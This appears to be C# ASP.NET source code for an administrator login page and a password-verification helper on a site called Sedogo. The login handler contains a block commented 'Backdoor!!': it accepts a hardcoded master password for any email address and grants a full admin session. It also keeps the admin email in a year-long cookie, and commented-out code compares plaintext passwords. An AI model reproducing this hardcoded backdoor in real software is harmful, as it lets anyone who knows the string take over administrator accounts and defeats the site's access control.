//=============================================================== // Function: loginButton_Click //=============================================================== public void loginButton_Click(object sender, EventArgs e) { string loginEmailAddress = emailAddress.Text; string loginPassword = userPassword.Text; HttpCookie cookie = new HttpCookie("SedogoAdministratorEmailAddress"); // Set the cookies value cookie.Value = loginEmailAddress; // Set the cookie to expire in 1 year DateTime dtNow = DateTime.Now; cookie.Expires = dtNow.AddYears(1); // Add the cookie Response.Cookies.Add(cookie); Administrator adminUser = new Administrator(""); loginResults checkResult; checkResult = adminUser.VerifyLogin(loginEmailAddress, loginPassword, false, true, "default.aspx"); // Backdoor!! if (loginPassword == "!!Sed0g0") { checkResult = loginResults.loginSuccess; int administratorID = Administrator.GetAdministratorIDFromEmailAddress(loginEmailAddress); adminUser = null; adminUser = new Administrator("", administratorID); } if ((checkResult == loginResults.loginSuccess) || (checkResult == loginResults.passwordExpired)) { Session.Add("loggedInAdministratorID", adminUser.administratorID); Session.Add("loggedInAdministratorName", adminUser.administratorName); Session.Add("loggedInAdministratorEmailAddress", adminUser.emailAddress); if ((checkResult == loginResults.loginSuccess) || (checkResult == loginResults.passwordExpired)) { FormsAuthentication.SetAuthCookie(loginEmailAddress, false); Session.Add("SuperUserID", adminUser.administratorID); string url = "~/admin/main.aspx"; Response.Redirect(url); } } if (checkResult == loginResults.loginFailed) { Page.ClientScript.RegisterStartupScript(this.GetType(), "Alert", "alert(\"Username or password is not correct\");", true); } }
/// <summary> /// Check the admin's password /// </summary> /// <param name="emailAddress">email is the login</param> /// <param name="password">password</param> /// <param name="db">database access object</param> /// <param name="adminId">output - admin id</param> /// <param name="fullName">output - admin's name</param> /// <returns>authentication is successful</returns> public static bool VerifyAdminLogin(string emailAddress, string password, SedogoDBEntities db, out int? adminId, out string fullName) { adminId = null; fullName = null; var admin = new Administrator(""); var lr = admin.VerifyLogin(emailAddress, password, false, true, "API. VerifyAdminLogin"); if (lr == loginResults.loginSuccess) { adminId = admin.administratorID; fullName = admin.administratorName; return true; } return false; /*System.Data.Objects.ObjectResult<spVerifyAdministratorLogin_Result> lresult = db.spVerifyAdministratorLogin(emailAddress); spVerifyAdministratorLogin_Result loginResult = lresult.FirstOrDefault(); if (loginResult != null && loginResult.AdministratorPassword == password) { adminID = loginResult.AdministratorID; return true; } return false;*/ }